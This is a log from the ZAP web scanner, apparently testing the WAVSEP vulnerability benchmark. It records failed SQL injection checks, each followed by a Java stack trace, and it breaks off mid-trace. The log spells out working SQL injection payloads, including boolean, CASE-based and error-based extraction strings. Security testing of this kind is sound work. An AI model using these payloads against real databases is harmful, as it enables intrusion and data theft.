[ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini%' AND 5811=5811 AND '%'='] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini%' AND 5811=5811 AND '%'=' at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:720) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9682414 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini%' AND 3950=6933 AND '%'='] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini%' AND 3950=6933 AND '%'=' at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:737) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9682415 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini AND 1035=3048-- nJzv] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini AND 1035=3048-- nJzv at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:706) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9682416 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini AND 8225=8225-- VMcr] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini AND 8225=8225-- VMcr at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:720) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9682417 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini AND 1035=3048-- nJzv] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini AND 1035=3048-- nJzv at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:737) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9682418 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [(SELECT (CASE WHEN (6874=9424) THEN 6874 ELSE 6874*(SELECT 6874 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/(SELECT (CASE WHEN (6874=9424) THEN 6874 ELSE 6874*(SELECT 6874 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END)) at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:706) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9682419 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [(SELECT (CASE WHEN (3242=3242) THEN 3242 ELSE 3242*(SELECT 3242 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/(SELECT (CASE WHEN (3242=3242) THEN 3242 ELSE 3242*(SELECT 3242 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END)) at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:720) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9682420 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [(SELECT (CASE WHEN (6874=9424) THEN 6874 ELSE 6874*(SELECT 6874 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/(SELECT (CASE WHEN (6874=9424) THEN 6874 ELSE 6874*(SELECT 6874 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END)) at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:737) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9682421 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini) AND (SELECT 5588 FROM(SELECT COUNT(*),CONCAT(0x3a7861623a,(SELECT (ELT(5588=5588,1))),0x3a7561713a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND (9472=9472] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini) AND (SELECT 5588 FROM(SELECT COUNT(*),CONCAT(0x3a7861623a,(SELECT (ELT(5588=5588,1))),0x3a7561713a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND (9472=9472 at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9682421 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini AND (SELECT 6432 FROM(SELECT COUNT(*),CONCAT(0x3a7861623a,(SELECT (ELT(6432=6432,1))),0x3a7561713a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini AND (SELECT 6432 FROM(SELECT COUNT(*),CONCAT(0x3a7861623a,(SELECT (ELT(6432=6432,1))),0x3a7561713a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9682422 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini') AND (SELECT 6540 FROM(SELECT COUNT(*),CONCAT(0x3a7861623a,(SELECT (ELT(6540=6540,1))),0x3a7561713a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND ('CVJQ'='CVJQ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini') AND (SELECT 6540 FROM(SELECT COUNT(*),CONCAT(0x3a7861623a,(SELECT (ELT(6540=6540,1))),0x3a7561713a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND ('CVJQ'='CVJQ at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9682423 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini' AND (SELECT 6565 FROM(SELECT COUNT(*),CONCAT(0x3a7861623a,(SELECT (ELT(6565=6565,1))),0x3a7561713a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'VrtO'='VrtO] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini' AND (SELECT 6565 FROM(SELECT COUNT(*),CONCAT(0x3a7861623a,(SELECT (ELT(6565=6565,1))),0x3a7561713a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'VrtO'='VrtO at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9682424 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini%' AND (SELECT 9386 FROM(SELECT COUNT(*),CONCAT(0x3a7861623a,(SELECT (ELT(9386=9386,1))),0x3a7561713a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND '%'='] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini%' AND (SELECT 9386 FROM(SELECT COUNT(*),CONCAT(0x3a7861623a,(SELECT (ELT(9386=9386,1))),0x3a7561713a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND '%'=' at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9682425 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini AND (SELECT 7759 FROM(SELECT COUNT(*),CONCAT(0x3a7861623a,(SELECT (ELT(7759=7759,1))),0x3a7561713a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)-- Frvj] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini AND (SELECT 7759 FROM(SELECT COUNT(*),CONCAT(0x3a7861623a,(SELECT (ELT(7759=7759,1))),0x3a7561713a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)-- Frvj at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at 